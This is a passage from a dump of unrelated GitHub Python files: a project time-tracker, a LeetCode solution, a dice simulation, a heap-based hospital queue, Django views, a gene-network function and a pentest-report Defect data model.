Time'], tuple(session['Sub-Projects']))\n if key not in seen: # if the tuple is not in the set, add it and add the session to the new session history\n seen.add(key)\n new_session_history.append(session)\n\n project['Session History'] = new_session_history # set the new session history\n\n # sum up total time from session histories\n for session in project['Session History']:\n project['Total Time'] += float(session['Duration'])\n for sub in project['Sub Projects']:\n if sub in session['Sub-Projects']:\n project['Sub Projects'][sub] += round(float(session['Duration']))\n\n project['Total Time'] = round(project['Total Time'], 2)\n return project # update the project in the projects dict\n\n def log(self, projects=\"all\", fromDate=None, toDate=None, status=None, sessionNotes=True, noteLength=300):\n \"\"\"\n Print the session histories of projects over a given period.\n\n :param projects: list of project names to print session history.\n :param fromDate: date to start printing logs from in the format of MM-DD-YYY\n :param toDate: date to stop printing logs at in the format of MM-DD-YYY\n :param status: filter logged projects by status. Log either 'active', 'paused', or 'completed' projects\n :param sessionNotes: show session notes. True will print session notes, False will not.\n :param noteLength: maximum note length that can be printed before the note is replaced with an ellipse (...)\n \"\"\"\n\n valid_projects = []\n keys = self.get_keys()\n\n if str(projects).lower() == 'all':\n valid_projects = keys\n if status and status in self.__status_tags:\n valid_projects = [key for key in keys if self.__dict[key]['Status'] == status]\n else:\n for prjct in projects:\n if prjct not in keys:\n print(format_text(f\"Invalid project name! '[bright red]{prjct}[reset]' does not exist!\"))\n else:\n valid_projects.append(prjct)\n\n dates = listOfDates(fromDate, toDate)\n\n if not dates:\n print(format_text(f'Invalid input! End date [cyan]\"{toDate}\"[reset] cannot be earlier '\n f'than start date [cyan]\"{fromDate}\"[reset].'))\n return\n\n # create a sessions list\n sessions_list = [(project, self.__dict[project][\"Session History\"]) for project in valid_projects]\n cleaned_sessions = []\n\n for project, session_list in sessions_list:\n for session in session_list:\n if session[\"Date\"] in dates:\n cleaned_sessions.append((project, session))\n\n # sort sessions list by end time\n session_list = sorted(cleaned_sessions, key=lambda x: datetime.strptime(x[1][\"End Time\"], \"%H:%M:%S\"))\n\n # Sort session_list by date\n session_list.sort(key=lambda x: datetime.strptime(x[1]['Date'], \"%m-%d-%Y\"))\n\n def format_time(time):\n if time.hour > 0:\n time = time.strftime(\"%Hh %Mm\")\n else:\n time = time.strftime(\"%Mm %Ss\")\n return time\n\n def truncate_note(nte, nteLength):\n if len(nte) > nteLength:\n nte = nte[0: nte.find(\" \")] + \"[red].[green].[blue].[yellow] \" + nte[nte.rfind(\" \"):]\n # differentiate truncations from normal ellipses by adding color (RGB)\n return nte\n\n # Initialize variables\n current_date = None\n print_output = \"\"\n day_total = 0.0\n\n def print_date_output(crrnt_date, d_total):\n print_date = datetime.strptime(crrnt_date, \"%m-%d-%Y\")\n print_date = print_date.strftime(\"%A %d %B %Y\")\n d_total = str(timedelta(minutes=d_total)).split(\".\")[0]\n d_total = datetime.strptime(d_total, \"%H:%M:%S\")\n d_total = format_time(d_total)\n\n print(format_text(f\"[underline]{print_date}[reset]\"\n f\" [_text256_34_]({d_total})[reset]\"))\n\n # Iterate over sessions\n for project, session in reversed(session_list):\n # Check if date has changed\n if current_date != session['Date']:\n # Print output for previous date\n if current_date is not None:\n print_date_output(current_date, day_total)\n print(print_output)\n\n # Reset variables for new date\n current_date = session['Date']\n print_output = \"\"\n day_total = 0.0\n\n # Calculate time spent and add to day total\n time_spent = str(timedelta(minutes=session['Duration'])).split(\".\")[0]\n time_spent = datetime.strptime(time_spent, \"%H:%M:%S\")\n day_total += session['Duration']\n time_spent = format_time(time_spent)\n\n # Format subprojects and note\n sub_projects = [f\"[_text256_26_]{sub_proj}[reset]\" for sub_proj in session['Sub-Projects']]\n note = truncate_note(session['Note'], noteLength)\n\n # Add session details to print output\n print_output += format_text(f\"[cyan]{session['Start Time']}[reset] to \"\n f\"[cyan]{session['End Time']}[reset] \\t\"\n f\"{time_spent} \"\n f\"[bright red]{project}[reset] \"\n f\"{sub_projects} \" +\n (f\" -> [yellow]{note}[reset]\\n\" if note != \"\" and sessionNotes else \"\\n\")\n )\n\n # Print output for last date\n if current_date is not None:\n print_date_output(current_date, day_total)\n print(print_output)\n\n def get_totals(self, projects=\"all\", status=None):\n \"\"\"\n Print the time spent totals and subtotals for given projects.\n\n :param projects: list of project names to show time totals.\n :param status: filter logged projects by status. Log either 'active', 'paused', or 'completed' projects\n \"\"\"\n valid_projects = []\n keys = self.get_keys()\n\n if str(projects).lower() == 'all':\n valid_projects = keys\n if status and status in self.__status_tags:\n valid_projects = [key for key in keys if self.__dict[key]['Status'] == status]\n else:\n for prjct in projects:\n if prjct not in keys:\n print(f\"Invalid project name! '{prjct}' does not exist!\")\n else:\n valid_projects.append(prjct)\n\n for prj in valid_projects:\n td = timedelta(minutes=self.__dict[prj]['Total Time'])\n startDate = datetime.strptime(self.__dict[prj]['Start Date'], \"%m-%d-%Y\")\n endDate = datetime.strptime(self.__dict[prj]['Last Updated'], \"%m-%d-%Y\")\n startDate = startDate.strftime(\"%d %B %Y\")\n endDate = endDate.strftime(\"%d %B %Y\")\n print(format_text(f\"[bright red]{prj}[reset]: [_text256_34_]{td_str(td)}[reset] \"\n f\"([cyan]{startDate}[reset] -> [cyan]{endDate}[reset])\"))\n\n sub_ls = list(self.__dict[prj][\"Sub Projects\"])\n length = len(sub_ls)\n\n for i in range(length):\n sub = sub_ls[i]\n sub_td = timedelta(minutes=self.__dict[prj][\"Sub Projects\"][sub])\n\n if i == 0 and length < 0 or i == length - 1:\n print(format_text(f\"└───[_text256_26_]{sub}[reset]: {td_str(sub_td)}\"))\n else:\n print(format_text(f\"├───[_text256_26_]{sub}[reset]: {td_str(sub_td)}\"))\n sess_count = len(self.__dict[prj][\"Session History\"])\n if sess_count > 0:\n print(format_text(f\"*[_text256]Session Count: {sess_count}[reset]\\n\"\n f\"*[_text256]Average duration: {td_str(td / sess_count)}[reset]\", 66))\n print(\"\")\n\n def complete_project(self, name):\n \"\"\"\n :param name: project name\n Mark a project as completed\n \"\"\"\n\n if name not in self.__dict:\n print(f\"Invalid project name! '{name}' does not exist!\")\n return\n\n self.__dict[name][\"Status\"] = self.__status_tags[2]\n self.__save()\n\n def pause_project(self, name):\n \"\"\"\n :param name: project name\n Mark a project as paused\n \"\"\"\n\n if name not in self.__dict:\n print(f\"Invalid project name! '{name}' does not exist!\")\n return\n\n self.__dict[name][\"Status\"] = self.__status_tags[1]\n self.__save()\n\n def mark_project_active(self, name):\n \"\"\"\n :param name: project name\n Mark a project as active\n \"\"\"\n\n if name not in self.__dict:\n print(f\"Invalid project name! '{name}' does not exist!\")\n return\n\n self.__dict[name][\"Status\"] = self.__status_tags[0]\n self.__save()\n\n def __sort_dict(self):\n \"\"\"\n Sort the dictionary by key (project name) in alphabetical order.\n Also call __remove_duplicate_sessions() to remove duplicate sessions when sorting.\n :return:\n \"\"\"\n sorted_keys = sorted(self.get_keys(), key=lambda x: x.lower())\n sorted_dict = {}\n\n for key in sorted_keys:\n # also remove duplicate sessions when sorting\n sorted_dict[key] = self.__remove_duplicate_sessions(self.__dict[key])\n\n self.__dict = sorted_dict\n\n def __save(self):\n self.__sort_dict()\n\n # compress and dump json data\n prjct_json = json.dumps(json_zip(self.__dict))\n with open(self.path, \"w\") as json_writer:\n json_writer.write(prjct_json)\n\n def __load(self):\n if not os.path.exists(self.path):\n return\n projects = open(self.path, \"r\").read()\n\n try:\n # load and decompress json data\n self.__dict = json_unzip(json.loads(projects))\n except ...:\n # load an uncompressed file\n self.__dict = json.loads(projects)\n\n for project in self.__dict:\n if \"Status\" not in self.__dict[project]:\n self.__dict[project][\"Status\"] = self.__status_tags[0]\n\n self.__sort_dict()\n\n def export_project(self, name: str, filename: str):\n \"\"\"\n Export projects to .json files.\n\n Files are saved in the 'Exported' folder within the base directory.\n Has to end in .json.\n If extension isn't added, it will be added by the function.\n\n :param name: name of existing project to be exported\n :param filename: filename to save project in.\n\n \"\"\"\n if name not in self.__dict:\n print(f\"Invalid project name! '{name}' does not exist!\")\n return\n\n if not os.path.isdir(self.exported_path):\n os.mkdir(self.exported_path)\n\n path = os.path.join(self.exported_path, filename)\n\n if os.path.exists(path):\n file_contents = open(path, \"r\").read()\n file_dict = json.loads(file_contents)\n else:\n file_dict = {}\n\n file_dict[name] = self.__dict[name]\n\n prjct_json = json.dumps(file_dict, indent=4)\n\n with open(path, \"w\") as json_writer:\n json_writer.write(prjct_json)\n\n self.delete_project(name)\n\n def load_exported(self, filename: str, project_name=\"\"):\n \"\"\"\n Import previously exported projects.\n\n :param filename: filename to save project in.\n :param project_name: name of the project to import from the file\n\n \"\"\"\n path = os.path.join(self.exported_path, filename)\n\n if os.path.exists(path):\n projects = open(path, \"r\").read()\n if project_name != \"\" and project_name != \"all\":\n if project_name not in self.__dict.keys():\n try:\n self.__dict[project_name] = json.loads(projects)[project_name]\n print(\n format_text(f\"Imported [yellow]{project_name}[reset] from '{filename}'\"))\n except KeyError:\n print(format_text(f\"\\n[yellow]{project_name}[reset] cannot be found in '{path}'\"))\n print(\"Here are all the projects that were found: \")\n for itr, name in enumerate(json.loads(projects)):\n print(format_text(f\"[yellow]{itr + 1}.{name}[reset]\"))\n\n else:\n print(format_text(f\"Conflict error! \"\n f\"Cannot import [yellow]{project_name}[reset] as it already exists!\"))\n\n elif project_name == \"all\":\n temp_dict = json.loads(projects)\n for project in temp_dict:\n if project not in self.__dict:\n self.__dict[project] = temp_dict[project]\n print(\n format_text(f\"Imported [yellow]{project}[reset] from '{filename}'\"))\n else:\n print(format_text(f\"Conflict error! \"\n f\"Cannot import [yellow]{project}[reset] as it already exists!\"))\n self.__save()\n\n else:\n print(f\"'{path}' does not exist!\")\n","repo_name":"Fingolfin7/Autumn","sub_path":"Source/projects.py","file_name":"projects.py","file_ext":"py","file_size_in_byte":34519,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"31189514837","text":"#\n# @lc app=leetcode.cn id=363 lang=python3\n#\n# [363] 矩形区域不超过 K 的最大数值和\n#\n\n# @lc code=start\nfrom typing import List\nclass Solution:\n def maxSumSubmatrix(self, matrix: List[List[int]], k: int) -> int:\n m, n = len(matrix), len(matrix[0])\n from sortedcontainers import SortedList\n res = float(\"-inf\")\n for top in range(m):\n rowCompress = [0] * n # 列的和\n for bot in range(top, m):\n for c in range(n):\n rowCompress[c] += matrix[bot][c]\n totalSet = SortedList([0])\n s = 0\n for v in rowCompress:\n s += v\n lb = totalSet.bisect_left(s - k)\n if lb != len(totalSet):\n res = max(res, s-totalSet[lb])\n totalSet.add(s)\n\n return res\n\n\"\"\"\nAccepted\n27/27 cases passed (2968 ms)\nYour runtime beats 14.28 % of python3 submissions\nYour memory usage beats 52.48 % of python3 submissions (15.8 MB)\n\"\"\"\n\n# @lc code=end\n\n","repo_name":"Interesting6/FuckLeetCode","sub_path":"363.矩形区域不超过-k-的最大数值和.py","file_name":"363.矩形区域不超过-k-的最大数值和.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39817151745","text":"import random\nfrom scipy.stats import shapiro\n\ndist = 0\nthrows = 7\nALL_SIMULATIONS = 100000\nall_sum = []\nX = []\ndystrybuant = []\nall_means = []\nall_sums_count = []\nTRAILS = 100\n\ndef random_simulation(throws):\n move = []\n i = 0\n while(i 2:\r\n self.__swap(1, len(self.heap) - 1)\r\n max = self.heap.pop()\r\n self.__bubbleDown(1)\r\n elif len(self.heap) == 2:\r\n max = self.heap.pop()\r\n else:\r\n max = False\r\n return max\r\n\r\n def peek(self):\r\n if self.heap[1]:\r\n return self.heap[1] # retorna primeiro valor raiz (root)\r\n return False\r\n\r\n def __swap(self, i, j):\r\n self.heap[i], self.heap[j] = self.heap[j], self.heap[i] # troca as posições i e j entre elas\r\n\r\n def __floatUp(self, index):\r\n parent = index//2 # identifica o pai\r\n if index <= 1: # nao faz nada se for raiz\r\n return\r\n elif self.heap[index] > self.heap[parent]:\r\n self.__swap(index, parent) # troca as posições index e parent entre elas\r\n self.__floatUp(parent) # recursividade: ...\r\n\r\n def __bubbleDown(self, index):\r\n left = index * 2\r\n right = index * 2 + 1\r\n maior = index\r\n if len(self.heap) > left and self.heap[maior] < self.heap[left]:\r\n maior = left\r\n if len(self.heap) > right and self.heap[maior] < self.heap[right]:\r\n maior = right\r\n\r\n if maior != index:\r\n self.__swap(index, maior)\r\n self.__bubbleDown(maior)\r\n\r\nclass Paciente:\r\n def __init__(self, nomeCompleto, tipoSanguineo, dataNasciamento):\r\n self.nomeCompleto = nomeCompleto\r\n self.tipoSanguineo = tipoSanguineo\r\n self.dataNascimento = dataNasciamento\r\n\r\n def __str__(self):\r\n return f\"Paciente: {self.nomeCompleto}, de tipo sanguíneo: {self.tipoSanguineo}, nascido na data: {self.dataNascimento}\"\r\n\r\ndef imprimirChamado(lista):\r\n lista.reverse() # inverter lista para obter os ultimos adicionados\r\n if len(lista) > 5:\r\n for i in range(0, 5):\r\n print(f\"{i+1}: {lista[i]}\") # valores dentro dos ultimos 5 adicionados\r\n else:\r\n for i in range(0, len(lista)):\r\n print(f\"{i+1}: {lista[i]}\") # valores dentro dos ultimos adicionados (< 5)\r\n\r\n\r\nfilaPrioridade = MaxHeap() \r\nlistaAux = [] # Lista auxiliar para os pacientes já chamados\r\nordem = 999 # Ordem dos chamados (de forma decrescente)\r\n\r\nwhile(True):\r\n\r\n try:\r\n print(\r\n \"============================================\",\r\n \"\\n1) Adicionar novo paciente\",\r\n \"\\n2) Chamar próximo paciente\",\r\n \"\\n3) Mostrar próximo paciente (sem chamar)\",\r\n \"\\n4) Listar os 5 últimos chamados\",\r\n \"\\n5) Sair\",\r\n \"\\n============================================\"\r\n )\r\n\r\n op = int(input(\"Opção: \"))\r\n os.system('cls')\r\n\r\n if op == 1:\r\n\r\n nomePaciente = input(\"Nome do paciente: \")\r\n tipoSanguineo = input(\"Tipo sanguíneo do paciente: \")\r\n dataNascimento = input(\"Data de nascimento do paciente: \")\r\n prioridade = int(input(\"Prioridade do paciente: \"))\r\n\r\n if(prioridade < 1 or prioridade > 10):\r\n \r\n print(\"Valor inválido para prioridade, tente novamente...\")\r\n continue\r\n\r\n novoPaciente = Paciente(nomePaciente, tipoSanguineo, dataNascimento) # Novo paciente\r\n ticket = (prioridade, ordem, novoPaciente) # Ticket para espera\r\n\r\n filaPrioridade.put(ticket) # Ticket é posto dentro da fila de espera\r\n ordem -= 1\r\n \r\n elif op == 2:\r\n\r\n print(filaPrioridade.heap[1][2]) # Primeiro paciente com máxima prioridade\r\n listaAux.append(filaPrioridade.heap[1][2]) # Paciente adicionado na lista auxiliar\r\n filaPrioridade.get() # Paciente extraído da fila\r\n print(\"Paciente retirado da fila de espera\")\r\n \r\n elif op == 3:\r\n\r\n print(filaPrioridade.heap[1][2]) # Primeiro paciente com máxima prioridade\r\n \r\n elif op == 4:\r\n\r\n imprimirChamado(listaAux)\r\n\r\n elif op == 5:\r\n\r\n print(\"Encerramento do programa\")\r\n break\r\n\r\n else:\r\n print(\"Valor inválido, tente novamente...\")\r\n continue\r\n\r\n except IndexError:\r\n os.system('cls')\r\n print(\"Fila vazia!\")\r\n except ValueError:\r\n os.system('cls')\r\n print(\"Valor inválido, tente novamente...\")\r\n\r\n\r\n","repo_name":"RhodrigoLopesPicinini/FilaHospitalEmergencia","sub_path":"FilaHospital.py","file_name":"FilaHospital.py","file_ext":"py","file_size_in_byte":4676,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38291370206","text":"\"\"\"Defect Model.\"\"\"\n\nimport os\nfrom bson.objectid import ObjectId\nfrom pollenisatorcli.core.Models.Element import Element\nfrom pollenisatorcli.core.apiclient import APIClient\n\n\nclass Defect(Element):\n \"\"\"\n Represents a Defect object that defines a security defect. A security defect is a note added by a pentester on a port or ip which describes a security defect.\n\n Attributes:\n coll_name: collection name in pollenisator database\n \"\"\"\n coll_name = \"defects\"\n\n def __init__(self, valuesFromDb=None):\n \"\"\"Constructor\n Args:\n valueFromDb: a dict holding values to load into the object. A mongo fetched defect is optimal.\n possible keys with default values are : _id (None), parent (None), tags([]), infos({}),\n ip(\"\"), port(\"\"), proto(\"\"), title(\"\"), ease(\"\"), impact(\"\"), risk(\"\"),\n redactor(\"N/A\"), type([]), notes(\"\"), proofs([]), index(None)\n \"\"\"\n if valuesFromDb is None:\n valuesFromDb = {}\n self.proofs = []\n super().__init__(valuesFromDb.get(\"_id\", None), valuesFromDb.get(\"parent\", None), valuesFromDb.get(\n \"tags\", []), valuesFromDb.get(\"infos\", {}))\n self.initialize(valuesFromDb.get(\"ip\", \"\"), valuesFromDb.get(\"port\", \"\"),\n valuesFromDb.get(\n \"proto\", \"\"), valuesFromDb.get(\"title\", \"\"),\n valuesFromDb.get(\"ease\", \"\"), valuesFromDb.get(\n \"impact\", \"\"),\n valuesFromDb.get(\n \"risk\", \"\"), valuesFromDb.get(\"redactor\", \"N/A\"), list(valuesFromDb.get(\"type\", [])),\n valuesFromDb.get(\"notes\", \"\"), valuesFromDb.get(\"proofs\", []), valuesFromDb.get(\"infos\", {}),\n valuesFromDb.get(\"index\", \"0\"))\n\n def initialize(self, ip, port, proto, title=\"\", ease=\"\", impact=\"\", risk=\"\", redactor=\"N/A\", mtype=None, notes=\"\", proofs=None, infos=None, index=\"0\"):\n \"\"\"Set values of defect\n Args:\n ip: defect will be assigned to this IP, can be empty\n port: defect will be assigned to this port, can be empty but requires an IP.\n proto: protocol of the assigned port. tcp or udp.\n title: a title for this defect describing what it is\n ease: ease of exploitation for this defect described as a string \n impact: impact the defect has on system. Described as a string \n risk: the combination of impact/ease gives a resulting risk value. Described as a string\n redactor: A pentester that waill be the redactor for this defect.\n mtype: types of this security defects (Application, data, etc...). Default is None\n notes: notes took by pentesters\n proofs: a list of proof files, default to None.\n infos: a dictionnary with key values as additional information. Default to None\n index: the index of this defect in global defect table (only for unassigned defect)\n Returns:\n this object\n \"\"\"\n self.title = title\n self.ease = ease\n self.impact = impact\n self.risk = risk\n self.redactor = redactor\n self.mtype = mtype if mtype is not None else []\n self.notes = notes\n self.ip = ip\n self.port = port\n self.proto = proto\n self.infos = infos if infos is not None else {}\n self.proofs = proofs if proofs is not None else []\n self.index = index\n return self\n\n @classmethod\n def getRisk(cls, ease, impact):\n \"\"\"Dict to find a risk level given an ease and an impact.\n Args:\n ease: ease of exploitation of this defect as as tring\n impact: the defect impact on system security\n Returns:\n A dictionnary of dictionnary. First dict keys are eases of exploitation. Second key are impact strings.\n \"\"\"\n risk_from_ease = {\"Easy\": {\"Minor\": \"Major\", \"Important\": \"Major\", \"Major\": \"Critical\", \"Critical\": \"Critical\"},\n \"Moderate\": {\"Minor\": \"Important\", \"Important\": \"Important\", \"Major\": \"Major\", \"Critical\": \"Critical\"},\n \"Difficult\": {\"Minor\": \"Minor\", \"Important\": \"Important\", \"Major\": \"Major\", \"Critical\": \"Major\"},\n \"Arduous\": {\"Minor\": \"Minor\", \"Important\": \"Minor\", \"Major\": \"Important\", \"Critical\": \"Important\"}}\n return risk_from_ease.get(ease, {}).get(impact, \"N/A\")\n\n def delete(self):\n \"\"\"\n Delete the defect represented by this model in database.\n \"\"\"\n ret = self._id\n apiclient = APIClient.getInstance()\n return apiclient.delete(\"defects\", ret)\n\n def addInDb(self):\n \"\"\"\n Add this defect to pollenisator database.\n Returns: a tuple with :\n * bool for success\n * mongo ObjectId : already existing object if duplicate, create object id otherwise \n \"\"\"\n apiclient = APIClient.getInstance()\n base = self.getDbKey()\n base[\"notes\"] = self.notes\n base[\"ease\"] = self.ease\n base[\"impact\"] = self.impact\n base[\"risk\"] = self.risk\n base[\"redactor\"] = self.redactor\n base[\"type\"] = list(self.mtype)\n base[\"proofs\"] = self.proofs\n if self.index is not None:\n base[\"index\"] = str(self.index)\n res, id = apiclient.insert(\"defects\", base)\n if not res:\n return False, id\n self._id = id\n return True, id\n\n \n\n def update(self, pipeline_set=None):\n \"\"\"Update this object in database.\n Args:\n pipeline_set: (Opt.) A dictionnary with custom values. If None (default) use model attributes.\n \"\"\"\n apiclient = APIClient.getInstance()\n if pipeline_set is None:\n apiclient.update(\"defects\", ObjectId(self._id), {\"ip\": self.ip, \"title\": self.title, \"port\": self.port,\n \"proto\": self.proto, \"notes\": self.notes, \"ease\": self.ease, \"impact\": self.impact,\n \"risk\": self.risk, \"redactor\": self.redactor, \"type\": list(self.mtype), \"proofs\": self.proofs, \"infos\": self.infos, \"index\":str(self.index)})\n else:\n apiclient.update(\"defects\", ObjectId(self._id), pipeline_set)\n\n def _getParentId(self):\n \"\"\"\n Return the mongo ObjectId _id of the first parent of this object. For a Defect it is either an ip or a port depending on the Defect's level.\n\n Returns:\n Returns the parent's ObjectId _id\".\n \"\"\"\n try:\n port = self.port\n except AttributeError:\n port = None\n \n apiclient = APIClient.getInstance()\n if port is None:\n port = \"\"\n if port == \"\":\n obj = apiclient.find(\"ips\", {\"ip\": self.ip}, False)\n else:\n obj = apiclient.find(\n \"ports\", {\"ip\": self.ip, \"port\": self.port, \"proto\": self.proto}, False)\n return obj[\"_id\"]\n\n def calcDirPath(self):\n \"\"\"Returns a directory path constructed for this defect.\n Returns:\n path as string\n \"\"\"\n apiclient = APIClient.getInstance()\n path_calc = str(apiclient.getCurrentPentest())+\"/\"+str(self.ip)\n try:\n port = self.port\n except AttributeError:\n port = None\n if port is not None:\n path_calc += \"/\"+str(self.port)+\"_\"+str(self.proto)\n path_calc += \"/\"+str(self._id)\n return path_calc\n\n def uploadProof(self, proof_local_path):\n \"\"\"Upload the given proof file to the server\n Args:\n proof_local_path: a path to a local proof file\n Returns:\n the basename of the file \n \"\"\"\n apiclient = APIClient.getInstance()\n apiclient.putProof(self._id, proof_local_path)\n return os.path.basename(proof_local_path)\n\n def getProof(self, ind):\n \"\"\"Download the proof file at given proof index\n Returns:\n A string giving the local path of the downloaded proof\n \"\"\"\n apiclient = APIClient.getInstance()\n current_dir = os.path.dirname(os.path.realpath(__file__))\n local_path = os.path.join(current_dir, \"../../results\", self.calcDirPath())\n try:\n os.makedirs(local_path)\n except FileExistsError:\n pass\n local_path = os.path.join(local_path, self.proofs[ind])\n ret = apiclient.getProof(self._id, self.proofs[ind], local_path)\n return ret\n\n def removeProof(self, ind):\n \"\"\"Removes the proof file at given proof index\n \"\"\"\n apiclient = APIClient.getInstance()\n filename = self.proofs[ind]\n ret = apiclient.rmProof(self._id, filename)\n del self.proofs[ind]\n return ret\n\n def __str__(self):\n \"\"\"\n Get a string representation of a defect.\n\n Returns:\n Returns the defect +title.\n \"\"\"\n return self.title\n\n def getDetailedString(self):\n \"\"\"Returns a detailed string describing for this defect.\n Returns:\n the defect title. If assigned, it will be prepended with ip and (udp/)port\n \"\"\"\n ret = \"\"\n if self.ip is not None:\n if self.ip != \"\":\n ret += str(self.ip)\n if self.proto is not None and self.port is not None:\n if self.port != \"\":\n if self.proto != \"tcp\":\n ret += \":\"+self.proto+\"/\"+self.port\n else:\n ret += \":\"+self.port\n ret += \" \"+self.__str__()\n return ret\n\n def getDbKey(self):\n \"\"\"Return a dict from model to use as unique composed key.\n Returns:\n A dict (4 keys :\"ip\", \"port\", \"proto\", \"title\")\n \"\"\"\n return {\"ip\": self.ip, \"port\": self.port, \"proto\": self.proto, \"title\": self.title}\n\n def isAssigned(self):\n \"\"\"Returns a boolean indicating if this defect is assigned to an ip or is global.\n Returns:\n bool\n \"\"\"\n return self.ip != \"\"\n\n @classmethod\n def getDefectTable(cls):\n \"\"\"Return the table of global defects sorted by their index field\n Returns:\n A list of Defect\n \"\"\"\n return APIClient.getInstance().getDefectTable()\n \n","repo_name":"fbarre96/PollenisatorCLI","sub_path":"pollenisatorcli/core/Models/Defect.py","file_name":"Defect.py","file_ext":"py","file_size_in_byte":10451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21829557617","text":"#!/usr/bin/python -O\n#\n# A small program to simulate results from an experiment with an exponential distribution.\n#\n# - Make sure you understand the code below\n# - Complete the evaluation_metric method so that it returns the mean\n# - What do you expect the results to be?\n# ----- I expect the result to be somewhere between 50% and 100%. Ideally it should be\n# ----- around 90%.\n# - \"Run\" the experiment. What's surprising.\n# ----- The results fall into the ballpark of 75%-79%, which is kind of surprising. The\n# ----- better_dist is 50% higher than individuals after all!\n# - Change the metric to something that more often selects the \"winning\" distribution.\n# ----- My new metric removes the top 2 from list to avoid cases where 1024 or 512 gets picked\n# ----- and skews the result. Now I win rate is about 93-95%.\n#\n\nimport math\nimport random\n\n\n# Consider this the \"true\" population distribution of number of ratings\nworse_dist = (\n [1024] * 1 +\n [512] * 2 +\n [256] * 4 +\n [128] * 8 +\n [64] * 16 +\n [32] * 32 +\n [16] * 64 +\n [8] * 128 +\n [4] * 256 +\n [2] * 512 +\n [1] * 1024\n\n)\n\n# better dist is 50% bigger than worse\nbetter_dist = [x * 1.5 for x in worse_dist]\n\n# Number of experiments to be simulated\nnum_experiments = 1000\n\n# Number of subjects per experiment \nnum_subjects = 100\n\ndef evaluation_metric(contribution_counts):\n \"\"\"\n Given contributions counts (a list of floats)\n Returns a single float that is an evaluation metric.\n The float should captures the aggregate amount of work.\n \"\"\"\n contribution_counts.remove(max(contribution_counts))\n contribution_counts.remove(max(contribution_counts))\n return sum(contribution_counts)/len(contribution_counts)\n\n# make sure you understand this code.\nnum_better_wins = 0\nfor i in range(num_experiments):\n l = random.sample(worse_dist, num_subjects / 2)\n b = random.sample(better_dist, num_subjects / 2)\n if evaluation_metric(b) > evaluation_metric(l):\n num_better_wins += 1\n\nprint('better distribution won %.1f%% of the time' % (100.0 * num_better_wins / num_experiments))\n","repo_name":"yulunli/COMP432","sub_path":"src/h0/unbalanced_experiments.py","file_name":"unbalanced_experiments.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3430102702","text":"from django.shortcuts import render\n\n# Create your views here.\nfrom django.views.generic import TemplateView\nfrom .forms import ZayavkaForm\nfrom .models import sms_send\n\n\n#class IndexPageView(TemplateView):\n# template_name = \"index.html\"\n# context_object_name = 'index'\n\n# zayavka_view(request)\n # def get_context_data(self, **kwargs):\n # context = super(HomePageView, self).get_context_data(**kwargs)\n # context['latest_articles'] = Article.objects.all()[:5]\n # return context\n\n\ndef index_view(request):\n args = {}\n\n if request.method == 'POST':\n zayavka_form = ZayavkaForm(request.POST)\n\n if zayavka_form.is_valid():\n phone_number = zayavka_form.cleaned_data['phone_number']\n zayavka_text = zayavka_form.cleaned_data['zayavka_text']\n zayavka_name = zayavka_form.cleaned_data['zayavka_name']\n zayavka_msg = \"zayavka ot %s %s %s\" % (phone_number, zayavka_name, zayavka_text)\n sms_request = sms_send(zayavka_msg)\n args['sms_request'] = sms_request\n\n else:\n zayavka_msg = 'Не правильно заполнена форма!!'\n\n\n else:\n zayavka_form = ZayavkaForm()\n zayavka_msg = \"Введите данные!\"\n\n args['zayavka_form'] = zayavka_form\n args['title'] = 'BismIllah:'\n args['sms_text'] = zayavka_msg\n\n return render(request, 'index.html', args)\n","repo_name":"jagger909/bergruz","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9387809875","text":"from django.shortcuts import render\nfrom .models import Image_uploader\nfrom .froms import Image_form\n# Create your views here.\ndef image_iplaoder(request):\n if request.method==\"POST\":\n fm=Image_form(request.POST,request.FILES)\n if fm.is_valid():\n fm.save()\n fm=Image_form()\n img=Image_uploader.objects.all()\n return render (request,'enroll/home.html',{'form':fm,'fm':img})","repo_name":"rafeeq13/django-projects","sub_path":"image_uplaoder/enroll/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18384950566","text":"import numpy as np\nfrom numpy.linalg import svd\nimport scipy\n\n\ndef pcNet(X, nComp = 3, scale = True, symmetric = False, q = 0): # X: cell * gene, q: 0-100\n X = scipy.sparse.csr_matrix.toarray(X) if scipy.sparse.issparse(X) else X\n if not isinstance(X, np.ndarray):\n raise ValueError('Input should be a numpy array with cells as rows and genes as columns')\n elif nComp < 2 or nComp >= X.shape[1]:\n raise ValueError('nComp should be greater or equal than 2 and lower than the total number of genes')\n \n else:\n n = X.shape[1] # genes\n def pcCoefficients(K):\n y = X[:, K] \n Xi = np.delete(X, K, 1)\n U, s, VT = svd(Xi, full_matrices=False) \n #print ('U:', U.shape, 's:', s.shape, 'VT:', VT.shape)\n V = VT[:nComp, :].T\n #print('V:', V.shape)\n\n score = Xi@V\n t = np.sqrt(np.sum(score**2, axis=0))\n score_lsq = ((score.T / (t**2)[:, None])).T\n beta = np.sum(y[:, None]*score_lsq, axis=0)\n beta = V@beta\n\n return list(beta)\n \n B = []\n for k in range(n):\n B.append(pcCoefficients(k))\n B = np.array(B)\n \n A = np.ones((n, n), dtype=float)\n np.fill_diagonal(A, 0)\n for i in range(n):\n A[i, A[i, :]==1] = B[i, :]\n \n if scale:\n absA = abs(A)\n A = A / np.max(absA)\n if q > 0:\n A[absA < np.percentile(absA, q)] = 0\n if symmetric: # place in the end\n A = (A + A.T)/2\n #diag(A) <- 0\n \n return A\n \n \n","repo_name":"qwerty239qwe/Xct","sub_path":"pcNet.py","file_name":"pcNet.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34505265324","text":"import os\nfrom tqdm import tqdm\n\nimport torch\nfrom torch.utils.data import DataLoader\n\nfrom 